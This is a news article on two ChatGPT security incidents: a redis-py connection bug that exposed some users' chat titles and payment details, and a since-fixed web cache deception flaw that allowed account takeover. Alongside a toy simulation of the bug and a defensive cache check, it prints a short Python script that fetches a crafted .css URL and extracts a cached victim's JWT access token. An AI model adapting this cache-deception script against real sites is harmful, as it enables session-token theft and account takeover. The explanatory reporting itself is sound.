OpenAI on Friday disclosed that a bug in the Redis open source library was responsible for exposing some users’ personal information and chat titles to other users of the upstart’s ChatGPT service earlier this week.
The glitch, which came to light on March 20, 2023, enabled certain users to view brief descriptions of other users’ conversations from the chat history sidebar, prompting the company to temporarily shut down the chatbot.
“It’s also possible that the first message of a newly-created conversation was visible in someone else’s chat history if both users were active around the same time,” the company said.
The bug, the company added, originated in the redis-py library and led to a scenario in which canceled requests could corrupt connections and return unexpected data from the database cache, in this case information belonging to an unrelated user.
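Roughly speaking, a Redis client reads replies off a shared connection in the same order the commands were sent, so a request that is cancelled after its command goes out but before its reply is read can leave that reply sitting on the connection for the next caller. The toy simulation below illustrates that failure mode; it is not redis-py’s actual code, and the FakeConnection class and key names are invented purely for illustration.

```python
import asyncio
from collections import deque


class FakeConnection:
    """Toy stand-in for a shared client connection: replies are read
    strictly in the order the commands were sent."""

    def __init__(self):
        self._replies = deque()

    async def send_command(self, key):
        # Simulate the round trip: the server always answers, and the reply
        # sits buffered on the connection until someone reads it.
        await asyncio.sleep(0.01)
        self._replies.append(f"cached data for {key}")

    async def read_reply(self):
        await asyncio.sleep(0.01)
        return self._replies.popleft()


async def get(conn, key):
    await conn.send_command(key)
    return await conn.read_reply()


async def main():
    conn = FakeConnection()

    # User A's request is cancelled after the command went out but before
    # the reply was consumed, so A's reply stays queued on the connection.
    task_a = asyncio.create_task(get(conn, "user_a:chat_history"))
    await asyncio.sleep(0.015)
    task_a.cancel()
    try:
        await task_a
    except asyncio.CancelledError:
        pass

    # User B's next request now reads the stale reply meant for user A.
    print(await get(conn, "user_b:chat_history"))  # -> "cached data for user_a:chat_history"


asyncio.run(main())
```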
To make matters worse, the San Francisco-based AI research company said it inadvertently introduced a server-side change that caused a spike in request cancellations, thereby increasing the error rate.
While the problem has since been addressed, OpenAI noted that the issue may have had broader implications, potentially revealing payment-related information for 1.2% of ChatGPT Plus subscribers between 1 a.m. and 10 a.m. PT on March 20.
This included another active user’s first and last name, email address, payment address, the last four digits (only) of a credit card number, and credit card expiration date. It emphasized that full credit card numbers were not exposed.
The company said it has reached out to affected users to notify them of the inadvertent leak. It also said it “added redundant checks to ensure the data returned by our Redis cache matches the requesting user.”
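OpenAI has not published what those redundant checks look like. One way to picture the idea is to tag every cache entry with the ID of the user it belongs to and verify that tag on each read; the sketch below does exactly that, with the cache_set_for_user/cache_get_for_user helpers and a plain dict standing in for Redis all invented for illustration.

```python
import json


class CacheMismatchError(Exception):
    """Raised when a cached payload is tagged with a different user ID."""


def cache_set_for_user(cache, key, user_id, payload):
    # Store the owner alongside the value so reads can be cross-checked.
    cache[key] = json.dumps({"owner": user_id, "payload": payload})


def cache_get_for_user(cache, key, user_id):
    raw = cache.get(key)
    if raw is None:
        return None
    entry = json.loads(raw)
    if entry["owner"] != user_id:
        # Fail closed: a cache miss is better than another user's data.
        raise CacheMismatchError(f"entry for {entry['owner']!r} requested by {user_id!r}")
    return entry["payload"]


# Usage, with a plain dict standing in for Redis:
cache = {}
cache_set_for_user(cache, "chat:123:title", "user_a", "Trip planning")
print(cache_get_for_user(cache, "chat:123:title", "user_a"))   # "Trip planning"
try:
    cache_get_for_user(cache, "chat:123:title", "user_b")
except CacheMismatchError as exc:
    print("blocked:", exc)
```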
## **OpenAI Fixes Critical Account Takeover Flaw**
In another caching-related issue, the company also addressed a critical account takeover vulnerability that could be exploited to seize control of another user’s account, view their chat history, and access billing information without their knowledge.
The flaw, which was discovered by security researcher Gal Nagli, bypasses protections put in place by OpenAI on chat.openai[.]com to read a victim’s sensitive data.
This is achieved by first creating a specially crafted link that appends a .css resource to the “chat.openai[.]com/api/auth/session/” endpoint and tricking a victim into clicking the link, causing the response, which contains a JSON object with the accessToken string, to be cached in Cloudflare’s CDN.
The cached response to the CSS resource (which has the CF-Cache-Status header value set to HIT) is then abused by the attacker to harvest the target’s JSON Web Token (JWT) credentials and take over the account.
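Taken together, the two steps amount to what is commonly called web cache deception: make a dynamic, authenticated response look like a cacheable static asset, then pull the cached copy back out of the CDN. The sketch below is a conceptual reconstruction of that flow based only on the details above; the .css suffix, endpoint path, CF-Cache-Status check, and accessToken field come from the write-up, while the file name and everything else are assumptions, not the researcher’s actual proof of concept. The issue has since been fixed, so the request no longer returns a cached session.

```python
import requests

# 1. A URL that the CDN treats as a static stylesheet but that the origin
#    routes to the authenticated session endpoint (path per the article;
#    the trailing file name is arbitrary).
crafted_url = "https://chat.openai.com/api/auth/session/anything.css"

# 2. The victim is tricked into opening crafted_url while logged in; the CDN
#    caches the JSON response because the path looks like static content.

# 3. The attacker then fetches the same URL and receives the cached copy.
resp = requests.get(crafted_url, timeout=10)
if resp.headers.get("CF-Cache-Status") == "HIT" and "json" in resp.headers.get("Content-Type", ""):
    token = resp.json().get("accessToken")  # the victim's JWT, per the report
    print("cached session token:", token)
else:
    print("no cached session returned (the endpoint has since been fixed)")
```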
Nagli said the bug was fixed by OpenAI within two hours of responsible disclosure, indicative of the severity of the issue.